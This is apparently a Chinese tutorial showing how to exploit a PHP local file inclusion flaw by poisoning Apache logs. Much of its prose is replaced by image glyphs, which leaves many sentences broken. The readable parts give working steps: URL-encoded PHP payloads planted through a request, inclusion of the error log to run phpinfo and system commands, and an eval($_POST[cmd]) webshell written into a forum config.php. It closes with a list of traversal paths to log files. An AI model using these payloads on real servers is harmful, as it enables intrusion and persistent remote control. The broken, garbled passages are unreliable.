而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是
![](/icons/97572yi.gif)
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou2.gif)
比如我们提交要提交这句
![](/icons/97572dou.gif)
![](/icons/97572kh.gif)
![](/icons/97572de.gif)
在这里
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
![](/icons/97572yinwei.gif)
![](/icons/97572dou.gif)
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou2.gif)
在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了
![](/icons/97572de.gif)
![](/icons/97572kh.gif)
![](/icons/97572dou.gif)
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
这样肯定会报出错找不到页面
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
![](/icons/97572cuowu.gif)
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
这样这个日志文件就被包含成了phpinfo
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
如果可以
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
<?system("ls+-la+/home");?> //执行命令列出home下
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou2.gif)
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
这样就列出了home下
![](/icons/97572de.gif)
或者直接
![](/icons/97572yi.gif)
![](/icons/97572dou.gif)
这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 这样
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
我们提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
再用lanker
![](/icons/97572de.gif)
![](/icons/97572yi.gif)
![](/icons/97572yi.gif)
![](/icons/97572dou2.gif)
![](/icons/97572yinwei.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou2.gif)
![](/icons/97572de.gif)
![](/icons/97572yi.gif)
![](/icons/97572yi.gif)
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
比如还是这句
![](/icons/97572yi.gif)
<?eval($_POST[cmd]);?>
到这里你也许就想到了
![](/icons/97572dou.gif)
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
![](/icons/97572dou2.gif)
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> //在config.php里写入
![](/icons/97572yi.gif)
我们提交这句
![](/icons/97572dou.gif)
![](/icons/97572cuowu.gif)
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
![](/icons/97572dou2.gif)
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
这样就
![](/icons/97572cuowu.gif)
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
我们再来包含日志
![](/icons/97572dou.gif)
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
这样webshell就写入成功了
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
OK.
http://www.xxx.com/forum/config.php这个就成了我们
![](/icons/97572de.gif)
直接用lanker
![](/icons/97572de.gif)
![](/icons/97572yi.gif)
![](/icons/97572dou.gif)
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
PS:上面讲
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
![](/icons/97572yi.gif)
![](/icons/97572dou.gif)
![](/icons/97572de.gif)
![](/icons/97572dou2.gif)
![](/icons/97572de.gif)
![](/icons/97572de.gif)
![](/icons/97572de.gif)
其他
![](/icons/97572de.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou.gif)
![](/icons/97572dou2.gif)
附:收集
![](/icons/97572de.gif)
![](/icons/97572yi.gif)
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
![](/icons/97572yi.gif)
![](/icons/97572yi.gif)
![](/icons/97572yi.gif)
最新评论